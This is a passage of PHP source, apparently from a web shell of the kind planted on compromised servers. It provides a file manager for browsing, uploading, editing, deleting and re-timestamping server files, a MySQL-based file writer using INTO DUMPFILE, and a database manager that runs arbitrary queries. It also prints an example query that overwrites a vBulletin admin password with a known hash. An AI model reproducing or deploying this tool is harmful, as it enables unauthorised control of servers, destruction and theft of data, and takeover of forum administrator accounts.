{\n\t\t\tm(\'Please select file(s)\');\n\t\t}\n\t}\n\n\t// Function Newdir\n\tformhead(array(\'name\'=>\'createdir\'));\n\tmakehide(\'newdirname\');\n\tmakehide(\'dir\',$nowpath);\n\tformfoot();\n\tformhead(array(\'name\'=>\'fileperm\'));\n\tmakehide(\'newperm\');\n\tmakehide(\'pfile\');\n\tmakehide(\'dir\',$nowpath);\n\tformfoot();\n\tformhead(array(\'name\'=>\'copyfile\'));\n\tmakehide(\'sname\');\n\tmakehide(\'tofile\');\n\tmakehide(\'dir\',$nowpath);\n\tformfoot();\n\tformhead(array(\'name\'=>\'rename\'));\n\tmakehide(\'oldname\');\n\tmakehide(\'newfilename\');\n\tmakehide(\'dir\',$nowpath);\n\tformfoot();\n\tformhead(array(\'name\'=>\'fileopform\'));\n\tmakehide(\'action\');\n\tmakehide(\'opfile\');\n\tmakehide(\'dir\');\n\tformfoot();\n\n\t$free = @disk_free_space($nowpath);\n\t!$free && $free = 0;\n\t$all = @disk_total_space($nowpath);\n\t!$all && $all = 0;\n\t$used = $all-$free;\n\t$used_percent = @round(100/($all/$free),2);\n\tp(\'<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>\'.sizecount($free).\'</font> of <font color=red>\'.sizecount($all).\'</font> (<font color=red>\'.$used_percent.\'</font>%)</font>\');\n\n?>\n<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">\n  <form action="" method="post" id="godir" name="godir">\n  <tr>\n    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>\n\t<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>\n    <td nowrap><input class="bt" value="GO" type="submit"></td>\n  </tr>\n  </form>\n</table>\n<script type="text/javascript">\nfunction createdir(){\n\tvar newdirname;\n\tnewdirname = prompt(\'Please input the directory name:\', \'\');\n\tif (!newdirname) return;\n\t$(\'createdir\').newdirname.value=newdirname;\n\t$(\'createdir\').submit();\n}\nfunction fileperm(pfile){\n\tvar newperm;\n\tnewperm = prompt(\'Current file:\'+pfile+\'\\nPlease input new attribute:\', \'\');\n\tif (!newperm) return;\n\t$(\'fileperm\').newperm.value=newperm;\n\t$(\'fileperm\').pfile.value=pfile;\n\t$(\'fileperm\').submit();\n}\nfunction copyfile(sname){\n\tvar tofile;\n\ttofile = prompt(\'Original file:\'+sname+\'\\nPlease input object file (fullpath):\', \'\');\n\tif (!tofile) return;\n\t$(\'copyfile\').tofile.value=tofile;\n\t$(\'copyfile\').sname.value=sname;\n\t$(\'copyfile\').submit();\n}\nfunction rename(oldname){\n\tvar newfilename;\n\tnewfilename = prompt(\'Former file name:\'+oldname+\'\\nPlease input new filename:\', \'\');\n\tif (!newfilename) return;\n\t$(\'rename\').newfilename.value=newfilename;\n\t$(\'rename\').oldname.value=oldname;\n\t$(\'rename\').submit();\n}\nfunction dofile(doing,thefile,m){\n\tif (m && !confirm(m)) {\n\t\treturn;\n\t}\n\t$(\'filelist\').doing.value=doing;\n\tif (thefile){\n\t\t$(\'filelist\').thefile.value=thefile;\n\t}\n\t$(\'filelist\').submit();\n}\nfunction createfile(nowpath){\n\tvar filename;\n\tfilename = prompt(\'Please input the file name:\', \'\');\n\tif (!filename) return;\n\topfile(\'editfile\',nowpath + filename,nowpath);\n}\nfunction opfile(action,opfile,dir){\n\t$(\'fileopform\').action.value=action;\n\t$(\'fileopform\').opfile.value=opfile;\n\t$(\'fileopform\').dir.value=dir;\n\t$(\'fileopform\').submit();\n}\nfunction godir(dir,view_writable){\n\tif (view_writable) {\n\t\t$(\'godir\').view_writable.value=1;\n\t}\n\t$(\'godir\').dir.value=dir;\n\t$(\'godir\').submit();\n}\n</script>\n  <?php\n\ttbhead();\n\tp(\'<form action="\'.$self.\'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">\');\n\tp(\'<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="\'.$dir.\'" type="hidden" /><input name="dir" value="\'.$dir.\'" type="hidden" /></div>\');\n\tp(\'<a href="javascript:godir(\\\'\'.$_SERVER["DOCUMENT_ROOT"].\'\\\');">WebRoot</a>\');\n\tif ($view_writable) {\n\t\tp(\' | <a href="javascript:godir(\\\'\'.$nowpath.\'\\\');">View All</a>\');\n\t} else {\n\t\tp(\' | <a href="javascript:godir(\\\'\'.$nowpath.\'\\\',\\\'1\\\');">View Writable</a>\');\n\t}\n\tp(\' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\\\'\'.$nowpath.\'\\\');">Create File</a>\');\n\tif (IS_WIN && IS_COM) {\n\t\t$obj = new COM(\'scripting.filesystemobject\');\n\t\tif ($obj && is_object($obj)) {\n\t\t\t$DriveTypeDB = array(0 => \'Unknow\',1 => \'Removable\',2 => \'Fixed\',3 => \'Network\',4 => \'CDRom\',5 => \'RAM Disk\');\n\t\t\tforeach($obj->Drives as $drive) {\n\t\t\t\tif ($drive->DriveType == 2) {\n\t\t\t\t\tp(\' | <a href="javascript:godir(\\\'\'.$drive->Path.\'/\\\');" title="Size:\'.sizecount($drive->TotalSize).\'&#13;Free:\'.sizecount($drive->FreeSpace).\'&#13;Type:\'.$DriveTypeDB[$drive->DriveType].\'">\'.$DriveTypeDB[$drive->DriveType].\'(\'.$drive->Path.\')</a>\');\n\t\t\t\t} else {\n\t\t\t\t\tp(\' | <a href="javascript:godir(\\\'\'.$drive->Path.\'/\\\');" title="Type:\'.$DriveTypeDB[$drive->DriveType].\'">\'.$DriveTypeDB[$drive->DriveType].\'(\'.$drive->Path.\')</a>\');\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tp(\'</td></tr></form>\');\n\n\tp(\'<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>\');\n\n\t// Get path\n\t$dirdata=array();\n\t$filedata=array();\n\n\tif ($view_writable) {\n\t\t$dirdata = GetList($nowpath);\n\t} else {\n\t\t// Open dir\n\t\t$dirs=@opendir($dir);\n\t\twhile ($file=@readdir($dirs)) {\n\t\t\t$filepath=$nowpath.$file;\n\t\t\tif(@is_dir($filepath)){\n\t\t\t\t$dirdb[\'filename\']=$file;\n\t\t\t\t$dirdb[\'mtime\']=@date(\'Y-m-d H:i:s\',filemtime($filepath));\n\t\t\t\t$dirdb[\'dirchmod\']=getChmod($filepath);\n\t\t\t\t$dirdb[\'dirperm\']=getPerms($filepath);\n\t\t\t\t$dirdb[\'fileowner\']=getUser($filepath);\n\t\t\t\t$dirdb[\'dirlink\']=$nowpath;\n\t\t\t\t$dirdb[\'server_link\']=$filepath;\n\t\t\t\t$dirdb[\'client_link\']=ue($filepath);\n\t\t\t\t$dirdata[]=$dirdb;\n\t\t\t} else {\n\t\t\t\t$filedb[\'filename\']=$file;\n\t\t\t\t$filedb[\'size\']=sizecount(@filesize($filepath));\n\t\t\t\t$filedb[\'mtime\']=@date(\'Y-m-d H:i:s\',filemtime($filepath));\n\t\t\t\t$filedb[\'filechmod\']=getChmod($filepath);\n\t\t\t\t$filedb[\'fileperm\']=getPerms($filepath);\n\t\t\t\t$filedb[\'fileowner\']=getUser($filepath);\n\t\t\t\t$filedb[\'dirlink\']=$nowpath;\n\t\t\t\t$filedb[\'server_link\']=$filepath;\n\t\t\t\t$filedb[\'client_link\']=ue($filepath);\n\t\t\t\t$filedata[]=$filedb;\n\t\t\t}\n\t\t}// while\n\t\tunset($dirdb);\n\t\tunset($filedb);\n\t\t@closedir($dirs);\n\t}\n\t@sort($dirdata);\n\t@sort($filedata);\n\t$dir_i = \'0\';\n\tforeach($dirdata as $key => $dirdb){\n\t\tif($dirdb[\'filename\']!=\'..\' && $dirdb[\'filename\']!=\'.\') {\n\t\t\t$thisbg = bg();\n\t\t\tp(\'<tr class="fout" onmouseover="this.className=\\\'focus\\\';" onmouseout="this.className=\\\'fout\\\';">\');\n\t\t\tp(\'<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>\');\n\t\t\tp(\'<td><a href="javascript:godir(\\\'\'.$dirdb[\'server_link\'].\'\\\');">\'.$dirdb[\'filename\'].\'</a></td>\');\n\t\t\tp(\'<td nowrap>\'.$dirdb[\'mtime\'].\'</td>\');\n\t\t\tp(\'<td nowrap>--</td>\');\n\t\t\tp(\'<td nowrap>\');\n\t\t\tp(\'<a href="javascript:fileperm(\\\'\'.$dirdb[\'server_link\'].\'\\\');">\'.$dirdb[\'dirchmod\'].\'</a> / \');\n\t\t\tp(\'<a href="javascript:fileperm(\\\'\'.$dirdb[\'server_link\'].\'\\\');">\'.$dirdb[\'dirperm\'].\'</a>\'.$dirdb[\'fileowner\'].\'</td>\');\n\t\t\tp(\'<td nowrap><a href="javascript:dofile(\\\'deldir\\\',\\\'\'.$dirdb[\'server_link\'].\'\\\',\\\'Are you sure will delete \'.$dirdb[\'filename\'].\'? \\\\n\\\\nIf non-empty directory, will be delete all the files.\\\')">Del</a> | <a href="javascript:rename(\\\'\'.$dirdb[\'server_link\'].\'\\\');">Rename</a></td>\');\n\t\t\tp(\'</tr>\');\n\t\t\t$dir_i++;\n\t\t} else {\n\t\t\tif($dirdb[\'filename\']==\'..\') {\n\t\t\t\tp(\'<tr class=fout>\');\n\t\t\t\tp(\'<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\\\'\'.getUpPath($nowpath).\'\\\');">Parent Directory</a></td>\');\n\t\t\t\tp(\'</tr>\');\n\t\t\t}\n\t\t}\n\t}\n\n\tp(\'<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>\');\n\tp(\'<form id="filelist" name="filelist" action="\'.$self.\'" method="post">\');\n\tmakehide(\'action\',\'file\');\n\tmakehide(\'thefile\');\n\tmakehide(\'doing\');\n\tmakehide(\'dir\',$nowpath);\n\t$file_i = \'0\';\n\tforeach($filedata as $key => $filedb){\n\t\tif($filedb[\'filename\']!=\'..\' && $filedb[\'filename\']!=\'.\') {\n\t\t\t$fileurl = str_replace(SA_ROOT,\'\',$filedb[\'server_link\']);\n\t\t\t$thisbg = bg();\n\t\t\tp(\'<tr class="fout" onmouseover="this.className=\\\'focus\\\';" onmouseout="this.className=\\\'fout\\\';">\');\n\t\t\tp(\'<td width="2%" nowrap><input type="checkbox" value="1" name="dl[\'.$filedb[\'server_link\'].\']"></td>\');\n\t\t\tp(\'<td><a href="\'.$fileurl.\'" target="_blank">\'.$filedb[\'filename\'].\'</a></td>\');\n\t\t\tp(\'<td nowrap>\'.$filedb[\'mtime\'].\'</td>\');\n\t\t\tp(\'<td nowrap>\'.$filedb[\'size\'].\'</td>\');\n\t\t\tp(\'<td nowrap>\');\n\t\t\tp(\'<a href="javascript:fileperm(\\\'\'.$filedb[\'server_link\'].\'\\\');">\'.$filedb[\'filechmod\'].\'</a> / \');\n\t\t\tp(\'<a href="javascript:fileperm(\\\'\'.$filedb[\'server_link\'].\'\\\');">\'.$filedb[\'fileperm\'].\'</a>\'.$filedb[\'fileowner\'].\'</td>\');\n\t\t\tp(\'<td nowrap>\');\n\t\t\tp(\'<a href="javascript:dofile(\\\'downfile\\\',\\\'\'.$filedb[\'server_link\'].\'\\\');">Down</a> | \');\n\t\t\tp(\'<a href="javascript:copyfile(\\\'\'.$filedb[\'server_link\'].\'\\\');">Copy</a> | \');\n\t\t\tp(\'<a href="javascript:opfile(\\\'editfile\\\',\\\'\'.$filedb[\'server_link\'].\'\\\',\\\'\'.$filedb[\'dirlink\'].\'\\\');">Edit</a> | \');\n\t\t\tp(\'<a href="javascript:rename(\\\'\'.$filedb[\'server_link\'].\'\\\');">Rename</a> | \');\n\t\t\tp(\'<a href="javascript:opfile(\\\'newtime\\\',\\\'\'.$filedb[\'server_link\'].\'\\\',\\\'\'.$filedb[\'dirlink\'].\'\\\');">Time</a>\');\n\t\t\tp(\'</td></tr>\');\n\t\t\t$file_i++;\n\t\t}\n\t}\n\tp(\'<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\\\'downrar\\\');">Packing download selected</a> - <a href="javascript:dofile(\\\'delfiles\\\');">Delete selected</a></td><td colspan="4" align="right">\'.$dir_i.\' directories / \'.$file_i.\' files</td></tr>\');\n\tp(\'</form></table>\');\n}// end dir\n\nelseif ($action == \'sqlfile\') {\n\tif($doing=="mysqlupload"){\n\t\t$file = $_FILES[\'uploadfile\'];\n\t\t$filename = $file[\'tmp_name\'];\n\t\tif (file_exists($savepath)) {\n\t\t\tm(\'The goal file has already existed\');\n\t\t} else {\n\t\t\tif(!$filename) {\n\t\t\t\tm(\'Please choose a file\');\n\t\t\t} else {\n\t\t\t\t$fp=@fopen($filename,\'r\');\n\t\t\t\t$contents=@fread($fp, filesize($filename));\n\t\t\t\t@fclose($fp);\n\t\t\t\t$contents = bin2hex($contents);\n\t\t\t\tif(!$upname) $upname = $file[\'name\'];\n\t\t\t\tdbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);\n\t\t\t\t$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE \'$savepath\';");\n\t\t\t\tm($result ? \'Upload success\' : \'Upload has failed: \'.mysql_error());\n\t\t\t}\n\t\t}\n\t}\n?>\n<script type="text/javascript">\nfunction mysqlfile(doing){\n\tif(!doing) return;\n\t$(\'doing\').value=doing;\n\t$(\'mysqlfile\').dbhost.value=$(\'dbinfo\').dbhost.value;\n\t$(\'mysqlfile\').dbport.value=$(\'dbinfo\').dbport.value;\n\t$(\'mysqlfile\').dbuser.value=$(\'dbinfo\').dbuser.value;\n\t$(\'mysqlfile\').dbpass.value=$(\'dbinfo\').dbpass.value;\n\t$(\'mysqlfile\').dbname.value=$(\'dbinfo\').dbname.value;\n\t$(\'mysqlfile\').charset.value=$(\'dbinfo\').charset.value;\n\t$(\'mysqlfile\').submit();\n}\n</script>\n<?php\n\t!$dbhost && $dbhost = \'localhost\';\n\t!$dbuser && $dbuser = \'root\';\n\t!$dbport && $dbport = \'3306\';\n\t$charsets = array(\'\'=>\'Default\',\'gbk\'=>\'GBK\', \'big5\'=>\'Big5\', \'utf8\'=>\'UTF-8\', \'latin1\'=>\'Latin1\');\n\tformhead(array(\'title\'=>\'MYSQL Information\',\'name\'=>\'dbinfo\'));\n\tmakehide(\'action\',\'sqlfile\');\n\tp(\'<p>\');\n\tp(\'DBHost:\');\n\tmakeinput(array(\'name\'=>\'dbhost\',\'size\'=>20,\'value\'=>$dbhost));\n\tp(\':\');\n\tmakeinput(array(\'name\'=>\'dbport\',\'size\'=>4,\'value\'=>$dbport));\n\tp(\'DBUser:\');\n\tmakeinput(array(\'name\'=>\'dbuser\',\'size\'=>15,\'value\'=>$dbuser));\n\tp(\'DBPass:\');\n\tmakeinput(array(\'name\'=>\'dbpass\',\'size\'=>15,\'value\'=>$dbpass));\n\tp(\'DBName:\');\n\tmakeinput(array(\'name\'=>\'dbname\',\'size\'=>15,\'value\'=>$dbname));\n\tp(\'DBCharset:\');\n\tmakeselect(array(\'name\'=>\'charset\',\'option\'=>$charsets,\'selected\'=>$charset));\n\tp(\'</p>\');\n\tformfoot();\n\tp(\'<form action="\'.$self.\'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">\');\n\tp(\'<h2>Upload file</h2>\');\n\tp(\'<p><b>This operation the DB user must has FILE privilege</b></p>\');\n\tp(\'<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\\\'mysqlupload\\\');">Upload</a></p>\');\n\tp(\'<h2>Download file</h2>\');\n\tp(\'<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\\\'mysqldown\\\');">Download</a></p>\');\n\tmakehide(\'dbhost\');\n\tmakehide(\'dbport\');\n\tmakehide(\'dbuser\');\n\tmakehide(\'dbpass\');\n\tmakehide(\'dbname\');\n\tmakehide(\'charset\');\n\tmakehide(\'doing\');\n\tmakehide(\'action\',\'sqlfile\');\n\tp(\'</form>\');\n}\n\nelseif ($action == \'sqladmin\') {\n\t!$dbhost && $dbhost = \'localhost\';\n\t!$dbuser && $dbuser = \'root\';\n\t!$dbport && $dbport = \'3306\';\n\t$dbform = \'<input type="hidden" id="connect" name="connect" value="1" />\';\n\tif(isset($dbhost)){\n\t\t$dbform .= "<input type=\\"hidden\\" id=\\"dbhost\\" name=\\"dbhost\\" value=\\"$dbhost\\" />\\n";\n\t}\n\tif(isset($dbuser)) {\n\t\t$dbform .= "<input type=\\"hidden\\" id=\\"dbuser\\" name=\\"dbuser\\" value=\\"$dbuser\\" />\\n";\n\t}\n\tif(isset($dbpass)) {\n\t\t$dbform .= "<input type=\\"hidden\\" id=\\"dbpass\\" name=\\"dbpass\\" value=\\"$dbpass\\" />\\n";\n\t}\n\tif(isset($dbport)) {\n\t\t$dbform .= "<input type=\\"hidden\\" id=\\"dbport\\" name=\\"dbport\\" value=\\"$dbport\\" />\\n";\n\t}\n\tif(isset($dbname)) {\n\t\t$dbform .= "<input type=\\"hidden\\" id=\\"dbname\\" name=\\"dbname\\" value=\\"$dbname\\" />\\n";\n\t}\n\tif(isset($charset)) {\n\t\t$dbform .= "<input type=\\"hidden\\" id=\\"charset\\" name=\\"charset\\" value=\\"$charset\\" />\\n";\n\t}\n\n\tif ($doing == \'backupmysql\' && $saveasfile) {\n\t\tif (!$table) {\n\t\t\tm(\'Please choose the table\');\n\t\t} else {\n\t\t\tdbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);\n\t\t\t$table = array_flip($table);\n\t\t\t$fp = @fopen($path,\'w\');\n\t\t\tif ($fp) {\n\t\t\t\t$result = q(\'SHOW tables\');\n\t\t\t\tif (!$result) p(\'<h2>\'.mysql_error().\'</h2>\');\n\t\t\t\t$mysqldata = \'\';\n\t\t\t\twhile ($currow = mysql_fetch_array($result)) {\n\t\t\t\t\tif (isset($table[$currow[0]])) {\n\t\t\t\t\t\tsqldumptable($currow[0], $fp);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tfclose($fp);\n\t\t\t\t$fileurl = str_replace(SA_ROOT,\'\',$path);\n\t\t\t\tm(\'Database has success backup to <a href="\'.$fileurl.\'" target="_blank">\'.$path.\'</a>\');\n\t\t\t\tmysql_close();\n\t\t\t} else {\n\t\t\t\tm(\'Backup failed\');\n\t\t\t}\n\t\t}\n\t}\n\tif ($insert && $insertsql) {\n\t\t$keystr = $valstr = $tmp = \'\';\n\t\tforeach($insertsql as $key => $val) {\n\t\t\tif ($val) {\n\t\t\t\t$keystr .= $tmp.$key;\n\t\t\t\t$valstr .= $tmp."\'".addslashes($val)."\'";\n\t\t\t\t$tmp = \',\';\n\t\t\t}\n\t\t}\n\t\tif ($keystr && $valstr) {\n\t\t\tdbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);\n\t\t\tm(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? \'Insert new record of success\' : mysql_error());\n\t\t}\n\t}\n\tif ($update && $insertsql && $base64) {\n\t\t$valstr = $tmp = \'\';\n\t\tforeach($insertsql as $key => $val) {\n\t\t\t$valstr .= $tmp.$key."=\'".addslashes($val)."\'";\n\t\t\t$tmp = \',\';\n\t\t}\n\t\tif ($valstr) {\n\t\t\t$where = base64_decode($base64);\n\t\t\tdbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);\n\t\t\tm(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? \'Record updating\' : mysql_error());\n\t\t}\n\t}\n\tif ($doing == \'del\' && $base64) {\n\t\t$where = base64_decode($base64);\n\t\t$delete_sql = "DELETE FROM $tablename WHERE $where";\n\t\tdbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);\n\t\tm(q("DELETE FROM $tablename WHERE $where") ? \'Deletion record of success\' : mysql_error());\n\t}\n\n\tif ($tablename && $doing == \'drop\') {\n\t\tdbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);\n\t\tif (q("DROP TABLE $tablename")) {\n\t\t\tm(\'Drop table of success\');\n\t\t\t$tablename = \'\';\n\t\t} else {\n\t\t\tm(mysql_error());\n\t\t}\n\t}\n\n\t$charsets = array(\'\'=>\'Default\',\'gbk\'=>\'GBK\', \'big5\'=>\'Big5\', \'utf8\'=>\'UTF-8\', \'latin1\'=>\'Latin1\');\n\n\tformhead(array(\'title\'=>\'MYSQL Manager\'));\n\tmakehide(\'action\',\'sqladmin\');\n\tp(\'<p>\');\n\tp(\'DBHost:\');\n\tmakeinput(array(\'name\'=>\'dbhost\',\'size\'=>20,\'value\'=>$dbhost));\n\tp(\':\');\n\tmakeinput(array(\'name\'=>\'dbport\',\'size\'=>4,\'value\'=>$dbport));\n\tp(\'DBUser:\');\n\tmakeinput(array(\'name\'=>\'dbuser\',\'size\'=>15,\'value\'=>$dbuser));\n\tp(\'DBPass:\');\n\tmakeinput(array(\'name\'=>\'dbpass\',\'size\'=>15,\'value\'=>$dbpass));\n\tp(\'DBCharset:\');\n\tmakeselect(array(\'name\'=>\'charset\',\'option\'=>$charsets,\'selected\'=>$charset));\n\tmakeinput(array(\'name\'=>\'connect\',\'value\'=>\'Connect\',\'type\'=>\'submit\',\'class\'=>\'bt\'));\n\tp(\'</p>\');\n\tformfoot();\n?>\n<script type="text/javascript">\nfunction editrecord(action, base64, tablename){\n\tif (action == \'del\') {\n\t\tif (!confirm(\'Is or isn\\\'t deletion record?\')) return;\n\t}\n\t$(\'recordlist\').doing.value=action;\n\t$(\'recordlist\').base64.value=base64;\n\t$(\'recordlist\').tablename.value=tablename;\n\t$(\'recordlist\').submit();\n}\nfunction moddbname(dbname) {\n\tif(!dbname) return;\n\t$(\'setdbname\').dbname.value=dbname;\n\t$(\'setdbname\').submit();\n}\nfunction settable(tablename,doing,page) {\n\tif(!tablename) return;\n\tif (doing) {\n\t\t$(\'settable\').doing.value=doing;\n\t}\n\tif (page) {\n\t\t$(\'settable\').page.value=page;\n\t}\n\t$(\'settable\').tablename.value=tablename;\n\t$(\'settable\').submit();\n}\n</script>\n<?php\n\t// SQL\n\tformhead(array(\'name\'=>\'recordlist\'));\n\tmakehide(\'doing\');\n\tmakehide(\'action\',\'sqladmin\');\n\tmakehide(\'base64\');\n\tmakehide(\'tablename\');\n\tp($dbform);\n\tformfoot();\n\n\t// Data\n\tformhead(array(\'name\'=>\'setdbname\'));\n\tmakehide(\'action\',\'sqladmin\');\n\tp($dbform);\n\tif (!$dbname) {\n\t\tmakehide(\'dbname\');\n\t}\n\tformfoot();\n\n\n\tformhead(array(\'name\'=>\'settable\'));\n\tmakehide(\'action\',\'sqladmin\');\n\tp($dbform);\n\tmakehide(\'tablename\');\n\tmakehide(\'page\',$page);\n\tmakehide(\'doing\');\n\tformfoot();\n\n\t$cachetables = array();\n\t$pagenum = 30;\n\t$page = intval($page);\n\tif($page) {\n\t\t$start_limit = ($page - 1) * $pagenum;\n\t} else {\n\t\t$start_limit = 0;\n\t\t$page = 1;\n\t}\n\tif (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {\n\t\tdbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);\n\t\t// get mysql server\n\t\t$mysqlver = mysql_get_server_info();\n\t\tp(\'<p>MySQL \'.$mysqlver.\' running in \'.$dbhost.\' as \'.$dbuser.\'@\'.$dbhost.\'</p>\');\n\t\t$highver = $mysqlver > \'4.1\' ? 1 : 0;\n\n\t\t// Show database\n\t\t$query = q("SHOW DATABASES");\n\t\t$dbs = array();\n\t\t$dbs[] = \'-- Select a database --\';\n\t\twhile($db = mysql_fetch_array($query)) {\n\t\t\t$dbs[$db[\'Database\']] = $db[\'Database\'];\n\t\t}\n\t\tmakeselect(array(\'title\'=>\'Please select a database:\',\'name\'=>\'db[]\',\'option\'=>$dbs,\'selected\'=>$dbname,\'onchange\'=>\'moddbname(this.options[this.selectedIndex].value)\',\'newline\'=>1));\n\t\t$tabledb = array();\n\t\tif ($dbname) {\n\t\t\tp(\'<p>\');\n\t\t\tp(\'Current dababase: <a href="javascript:moddbname(\\\'\'.$dbname.\'\\\');">\'.$dbname.\'</a>\');\n\t\t\tif ($tablename) {\n\t\t\t\tp(\' | Current Table: <a href="javascript:settable(\\\'\'.$tablename.\'\\\');">\'.$tablename.\'</a> [ <a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'insert\\\');">Insert</a> | <a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'structure\\\');">Structure</a> | <a href="javascript:settable(\\\'\'.$tablename.\'\\\', \\\'drop\\\');">Drop</a> ]\');\n\t\t\t}\n\t\t\tp(\'</p>\');\n\t\t\tmysql_select_db($dbname);\n\n\t\t\t$getnumsql = \'\';\n\t\t\t$runquery = 0;\n\t\t\tif ($sql_query) {\n\t\t\t\t$runquery = 1;\n\t\t\t}\n\t\t\t$allowedit = 0;\n\t\t\tif ($tablename && !$sql_query) {\n\t\t\t\t$sql_query = "SELECT * FROM $tablename";\n\t\t\t\t$getnumsql = $sql_query;\n\t\t\t\t$sql_query = $sql_query." LIMIT $start_limit, $pagenum";\n\t\t\t\t$allowedit = 1;\n\t\t\t}\n\t\t\tp(\'<form action="\'.$self.\'" method="POST">\');\n\t\t\tp(\'<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>\'.$dbname.\'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \\\'69e53e5ab9536e55d31ff533aefc4fbe\\\', salt = \\\'p5T\\\' WHERE `userid` = \\\'1\\\' </font>\n\t\t\t</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">\'.htmlspecialchars($sql_query,ENT_QUOTES).\'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>\');\n\t\t\tmakehide(\'tablename\', $tablename);\n\t\t\tmakehide(\'action\',\'sqladmin\');\n\t\t\tp($dbform);\n\t\t\tp(\'</form>\');\n\t\t\tif ($tablename || ($runquery && $sql_query)) {\n\t\t\t\tif ($doing == \'structure\') {\n\t\t\t\t\t$result = q("SHOW COLUMNS FROM $tablename");\n\t\t\t\t\t$rowdb = array();\n\t\t\t\t\twhile($row = mysql_fetch_array($result)) {\n\t\t\t\t\t\t$rowdb[] = $row;\n\t\t\t\t\t}\n\t\t\t\t\tp(\'<table border="0" cellpadding="3" cellspacing="0">\');\n\t\t\t\t\tp(\'<tr class="head">\');\n\t\t\t\t\tp(\'<td>Field</td>\');\n\t\t\t\t\tp(\'<td>Type</td>\');\n\t\t\t\t\tp(\'<td>Null</td>\');\n\t\t\t\t\tp(\'<td>Key</td>\');\n\t\t\t\t\tp(\'<td>Default</td>\');\n\t\t\t\t\tp(\'<td>Extra</td>\');\n\t\t\t\t\tp(\'</tr>\');\n\t\t\t\t\tforeach ($rowdb as $row) {\n\t\t\t\t\t\t$thisbg = bg();\n\t\t\t\t\t\tp(\'<tr class="fout" onmouseover="this.className=\\\'focus\\\';" onmouseout="this.className=\\\'fout\\\';">\');\n\t\t\t\t\t\tp(\'<td>\'.$row[\'Field\'].\'</td>\');\n\t\t\t\t\t\tp(\'<td>\'.$row[\'Type\'].\'</td>\');\n\t\t\t\t\t\tp(\'<td>\'.$row[\'Null\'].\'&nbsp;</td>\');\n\t\t\t\t\t\tp(\'<td>\'.$row[\'Key\'].\'&nbsp;</td>\');\n\t\t\t\t\t\tp(\'<td>\'.$row[\'Default\'].\'&nbsp;</td>\');\n\t\t\t\t\t\tp(\'<td>\'.$row[\'Extra\'].\'&nbsp;</td>\');\n\t\t\t\t\t\tp(\'</tr>\');\n\t\t\t\t\t}\n\t\t\t\t\ttbfoot();\n\t\t\t\t} elseif ($doing == \'insert\' || $doing == \'edit\') {\n\t\t\t\t\t$result = q(\'SHOW COLUMNS FROM \'.$tablename);\n\t\t\t\t\twhile ($row = mysql_fetch_array($result)) {\n\t\t\t\t\t\t$rowdb[] = $row;\n\t\t\t\t\t}\n\t\t\t\t\t$rs = array();\n\t\t\t\t\tif ($doing == \'insert\') {\n\t\t\t\t\t\tp(\'<h2>Insert new line in \'.$tablename.\' table &raquo;</h2>\');\n\t\t\t\t\t} else {\n\t\t\t\t\t\tp(\'<h2>Update record in \'.$tablename.\' table &raquo;</h2>\');\n\t\t\t\t\t\t$where = base64_decode($base64);\n\t\t\t\t\t\t$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");\n\t\t\t\t\t\t$rs = mysql_fetch_array($result);\n\t\t\t\t\t}\n\t\t\t\t\tp(\'<form method="post" action="\'.$self.\'">\');\n\t\t\t\t\tp($dbform);\n\t\t\t\t\tmakehide(\'action\',\'sqladmin\');\n\t\t\t\t\tmakehide(\'tablename\',$tablename);\n\t\t\t\t\tp(\'<table border="0" cellpadding="3" cellspacing="0">\');\n\t\t\t\t\tforeach ($rowdb as $row) {\n\t\t\t\t\t\tif ($rs[$row[\'Field\']]) {\n\t\t\t\t\t\t\t$value = htmlspecialchars($rs[$row[\'Field\']]);\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t$value = \'\';\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$thisbg = bg();\n\t\t\t\t\t\tp(\'<tr class="fout" 